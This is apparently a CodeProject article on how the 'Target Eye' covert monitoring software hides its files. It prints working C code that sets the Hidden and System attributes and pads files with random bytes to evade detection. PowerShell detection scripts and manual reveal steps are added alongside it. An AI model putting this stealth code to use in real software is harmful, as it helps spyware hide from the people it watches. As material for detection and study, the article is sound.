This article explains how Target Eye hides its files and when, and shows how to reveal them. Target Eye uses a simple mechanism to hide files, but the trick works on most Windows users because the option that reveals these files is not part of the default File Explorer view: even when "Show hidden items" is checked, the Target Eye hidden files remain invisible.
Introduction
This article is the sixth and last in a series about the Target Eye Monitoring System, which was developed from 2000 until 2010, when it was discontinued.
- The first article was about Target Eye's Auto Update mechanism: how it checks for updates, downloads them when they are available, installs them and runs the new version in place of the one currently running, all without end-user intervention.
- The second article was about Target Eye's screen capturing mechanism, and how compact JPG files are created that combine reasonable image quality with a small footprint.
- The third article was about the Shopping List mechanism.
- The fourth article was about keyboard capturing.
- The fifth article dealt with the packaging used to let our "Secret Agent" in; in other words, how Target Eye wraps it in what we refer to as a "cover story".
Target Eye's TEHideFile() Function
The TEHideFile() function is used to hide and unhide files, and can also change the size of a given file to a random size, making it harder to sample and detect.
Usage
By looking at the Target Eye 2005 source code, the function is defined as follows:
BOOL TEHideFile(CString FileName, BOOL Hide, BOOL RandomSize)
- FileName: the full path and name of the file.
- Hide: tells the function whether to hide or reveal the file.
- RandomSize: tells the function whether to append "garbage" data to the file (without affecting the way it functions), enlarging it to a random size.
How the Target Eye Files Become Hidden
Target Eye uses what seems to be an old-fashioned approach. Instead of kernel-level tricks (SSDT manipulation) or user-level global hooking, it simply rewrites the file with the Hidden and System attributes set, so that it looks like a protected operating system file. Such an approach was useful in the old days of Windows XP; however, when testing it under Windows 7 and 8, one finds that the hidden files are indeed still hidden, even when the "Hidden Items" checkbox is checked.
The following screenshot illustrates the "Hidden Items" checkbox:
As you can see, in the Windows 7 and 8 user interface it is not straightforward to even realize that there are additional system files which remain hidden after checking "Hidden Items". It is common sense to assume that after checking this checkbox, ALL files will be visible.
Well, that is not the case with the Target Eye hidden files: these will not be visible even when this option is checked.
That creates an opportunity to hide files, relatively speaking, from most users without any hooks or kernel-level manipulation.
How Can These System Files Be Shown After All?
Well, here is exactly how.
- You need to open the Folder Options dialog. When you use Windows 8 search, search in "All" (not only "Files"), type "Show Hidden Folders" and press Enter.
- The Folder Options dialog will be shown:
You need to uncheck "Hide protected operating system files" and then press "Yes" when the warning dialog appears.
Only then will you be able to see the Target Eye hidden files.
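The following PowerShell is an added example, not Target Eye code: it enumerates files that carry both the Hidden and System attributes (the combination Explorer treats as "protected operating system files") and shows the per-user registry values behind the Folder Options setting described above. The function names are mine; the registry path and value names are the ones Explorer actually reads.

```powershell
# Added example (not Target Eye code): find "super-hidden" files, i.e. files
# carrying both the Hidden and System attributes, which Explorer keeps
# invisible until "Hide protected operating system files" is unchecked.
function Find-SuperHiddenFile {
    param(
        [Parameter(Mandatory)] [string] $Path,
        [switch] $IncludeSigned     # default: drop files with a valid Authenticode signature
    )
    $mask = [IO.FileAttributes]::Hidden -bor [IO.FileAttributes]::System
    # -Force is what makes Get-ChildItem return hidden and system items at all.
    Get-ChildItem -Path $Path -Recurse -Force -File -ErrorAction SilentlyContinue |
        Where-Object { ($_.Attributes -band $mask) -eq $mask } |
        ForEach-Object {
            $sig    = Get-AuthenticodeSignature -FilePath $_.FullName -ErrorAction SilentlyContinue
            $status = if ($sig) { $sig.Status.ToString() } else { 'Unknown' }
            if ($IncludeSigned -or $status -ne 'Valid') {
                [pscustomobject]@{
                    FullName      = $_.FullName
                    Length        = $_.Length
                    LastWriteTime = $_.LastWriteTime
                    Signature     = $status
                }
            }
        }
}

# Same effect as selecting "Show hidden files" and unchecking "Hide protected
# operating system files" in Folder Options, done through the per-user
# registry values Explorer reads. Restart explorer.exe for it to take effect.
function Show-ProtectedOsFile {
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced'
    Set-ItemProperty -Path $key -Name 'Hidden'          -Value 1 -Type DWord  # 1 = show hidden files
    Set-ItemProperty -Path $key -Name 'ShowSuperHidden' -Value 1 -Type DWord  # 1 = show protected OS files
}

# Usage: list candidate files under the current user's profile.
Find-SuperHiddenFile -Path $env:USERPROFILE | Format-Table -AutoSize
```

Expect legitimate hits such as desktop.ini and thumbs.db; the value is in unsigned files that have no business being marked as protected operating system files.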
The TEHideFile() Source Code
#include <afx.h>     // MFC: CString, pulls in <windows.h>
#include <stdlib.h>  // malloc, free, rand
#include <string.h>  // memset

ULONG GetFileLen(CString FileName);   // defined further below

BOOL TEHideFile(CString FileName, BOOL Hide, BOOL RandomSize)
{
    HANDLE hFile;
    DWORD  dwBytes;
    ULONG  FileLen;

    FileLen = GetFileLen(FileName);
    if (FileLen == 0)
        return FALSE;

    // Read the whole file into memory (OPEN_EXISTING: never create it here).
    hFile = CreateFile((LPCTSTR)FileName, GENERIC_READ, FILE_SHARE_READ, NULL,
                       OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE)
        return FALSE;

    char *buffer = (char *)malloc(FileLen);
    if (buffer == NULL)
    {
        CloseHandle(hFile);
        return FALSE;
    }
    memset(buffer, '\0', FileLen);
    if (!ReadFile(hFile, buffer, FileLen, &dwBytes, NULL) || dwBytes != FileLen)
    {
        free(buffer);
        CloseHandle(hFile);
        return FALSE;
    }
    CloseHandle(hFile);

    // CREATE_ALWAYS fails on an existing Hidden/System file unless the same
    // attributes are passed again, so the old copy is removed first.
    DeleteFile(FileName);

    if (Hide)
        // Hidden + System: Explorer treats the file as a protected OS file.
        hFile = CreateFile((LPCTSTR)FileName, GENERIC_WRITE, FILE_SHARE_WRITE, NULL,
                           CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM, NULL);
    else
        hFile = CreateFile((LPCTSTR)FileName, GENERIC_WRITE, 0, NULL,
                           CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE)
    {
        free(buffer);
        return FALSE;
    }

    // Write the original content back.
    if (!WriteFile(hFile, buffer, FileLen, &dwBytes, NULL))
    {
        free(buffer);
        CloseHandle(hFile);
        return FALSE;
    }

    if (RandomSize)
    {
        // Append 3201..11831 bytes of random lowercase letters so the size
        // no longer matches the original file.
        int x = (int)((double)rand() / (double)RAND_MAX * 8630.0) + 3201;
        char *temp = (char *)malloc(x);
        if (temp)
        {
            int i;
            for (i = 0; i < x; i++)
                temp[i] = (char)('a' + rand() % ('z' - 'a' + 1));
            // Write x bytes (the size of temp), not FileLen.
            if (!WriteFile(hFile, temp, x, &dwBytes, NULL))
            {
                free(temp);
                free(buffer);
                CloseHandle(hFile);
                return FALSE;
            }
            free(temp);
        }
    }

    free(buffer);
    CloseHandle(hFile);
    return TRUE;
}
I have written GetFileLen() to make it easier to measure the size of a given file:
// Returns the size of FileName in bytes, or 0 if it is empty or cannot be opened.
ULONG GetFileLen(CString FileName)
{
    DWORD  dwBytes;
    HANDLE hFile;

    if (FileName == "")
        return 0;
    // OPEN_EXISTING so a missing file is reported as 0 rather than created empty.
    hFile = CreateFile((LPCTSTR)FileName, GENERIC_READ, FILE_SHARE_READ, NULL,
                       OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE)
        return 0;
    dwBytes = SetFilePointer(hFile, 0, NULL, FILE_END);
    CloseHandle(hFile);
    if (dwBytes == INVALID_SET_FILE_POINTER)
        return 0;
    return dwBytes;
}
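The following PowerShell is an added example, not Target Eye code, that turns the RandomSize padding above into a triage check: TEHideFile builds a buffer of 3201 to 11831 random letters 'a' to 'z' and appends it, so a file whose tail is nothing but lowercase letters, with no newline or space, for that many bytes deserves a closer look. The function names and the threshold parameters are mine, taken from the constants in the code above.

```powershell
# Added example (not Target Eye code): length of the run of bytes 'a'..'z'
# at the very end of a file. Only the last MaxTail bytes are read, so large
# files are cheap to check.
function Get-TrailingLowercaseRun {
    param(
        [Parameter(Mandatory)] [string] $Path,
        [int] $MaxTail = 11832           # one more than the largest padding
    )
    $fs = [IO.File]::OpenRead($Path)
    try {
        $take = [int][Math]::Min($fs.Length, [long]$MaxTail)
        $null = $fs.Seek(-$take, [IO.SeekOrigin]::End)
        $buf  = New-Object byte[] $take
        $read = $fs.Read($buf, 0, $take)
    } finally {
        $fs.Dispose()
    }
    $run = 0
    for ($i = $read - 1; $i -ge 0; $i--) {
        if ($buf[$i] -lt 0x61 -or $buf[$i] -gt 0x7A) { break }   # outside 'a'..'z'
        $run++
    }
    # If the whole inspected tail was lowercase, the real run may be longer still.
    return $run
}

# Flags a file whose trailing lowercase run falls in the range TEHideFile
# produces: x = rand/RAND_MAX * 8630 + 3201, i.e. 3201..11831 bytes.
function Test-TargetEyePadding {
    param(
        [Parameter(Mandatory)] [string] $Path,
        [int] $MinRun = 3201,   # smallest padding the code can produce
        [int] $MaxRun = 11831   # 3201 + 8630, the largest
    )
    $run = Get-TrailingLowercaseRun -Path $Path -MaxTail ($MaxRun + 1)
    [pscustomobject]@{
        Path        = $Path
        TrailingRun = $run
        Suspicious  = ($run -ge $MinRun -and $run -le $MaxRun)
    }
}

# Usage, e.g. over every hidden file in a folder:
# Get-ChildItem C:\Temp -File -Force | ForEach-Object { Test-TargetEyePadding $_.FullName }
```

A plain-text file made of one unbroken lowercase word run can trip this heuristic, so treat a hit as a reason to inspect the file (attributes, signature, PE overlay), not as a verdict.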
What About Global API Hooking?
To learn about global API hooking, I recommend reading the excellent article by ApriorIT, "Easy way to set up global API hooks". If you are interested in kernel-level hiding, that can be done using drivers. There are several techniques, among them SSDT/IDT table manipulation. See this article for example, or read this one about the SSDT.
History
- 15th June, 2014: Initial version
Michael Haephrati, CodeProject MVP 2013
©2000-2010 Target Eye LTD (UK)
All materials contained on this article are protected by International copyright law and may not be used, reproduced, distributed, transmitted, displayed, published or broadcast without the prior written permission given by Target Eye LTD (UK). You may not alter or remove any trademark, copyright or other notice from copies of the content.